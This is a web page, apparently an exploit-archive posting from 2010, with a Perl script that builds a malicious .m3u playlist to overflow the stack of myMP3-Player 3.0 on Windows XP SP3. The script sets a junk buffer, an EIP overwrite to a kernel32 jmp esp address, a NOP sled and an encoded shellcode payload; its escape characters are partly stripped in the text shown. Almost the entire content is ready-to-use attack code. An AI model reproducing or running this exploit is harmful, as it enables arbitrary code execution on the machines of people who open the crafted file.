Home / os / win7

myMP3-Player 3.0 (.m3u) File Buffer Overflow Stack Exploit

Posted on 08 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>myMP3-Player 3.0 (.m3u) File Buffer Overflow Stack Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== myMP3-Player 3.0 (.m3u) File Buffer Overflow Stack Exploit ========================================================== #!/usr/bin/perl # #my mp3 player 3.0 .m3u) File WinXP Sp3(fr) Buffer Overflow stack Exploit #Download :http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html# # Tested : Windows XP SP3 (fr) # DATE : 2010-08-7 ################################################################### # samir tjrs mahboul-3lik # ################################################################### my $file= &quot;mahboul-3lik.m3u&quot;; $junk =&quot;x41&quot;x 1024; my $eip = pack('V', 0x7C874413); #jmp esp from kernel32.dll $junk1 =&quot;x42&quot;x 1000; my $nop =&quot;x90&quot; x 24; my $shell = &quot;xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1&quot; . &quot;x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30&quot; . &quot;x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa&quot; . &quot;x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96&quot; . &quot;x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b&quot; . &quot;xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a&quot; . &quot;xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83&quot; . &quot;x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98&quot; . &quot;xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61&quot; . &quot;xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05&quot; . &quot;x7fxe8x7bxca&quot;; open($FILE, &quot;&gt;$file&quot;); print($FILE $junk.$eip.$nop.$shell.$junk1); close($FILE); print(&quot;exploit created successfully&quot;); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP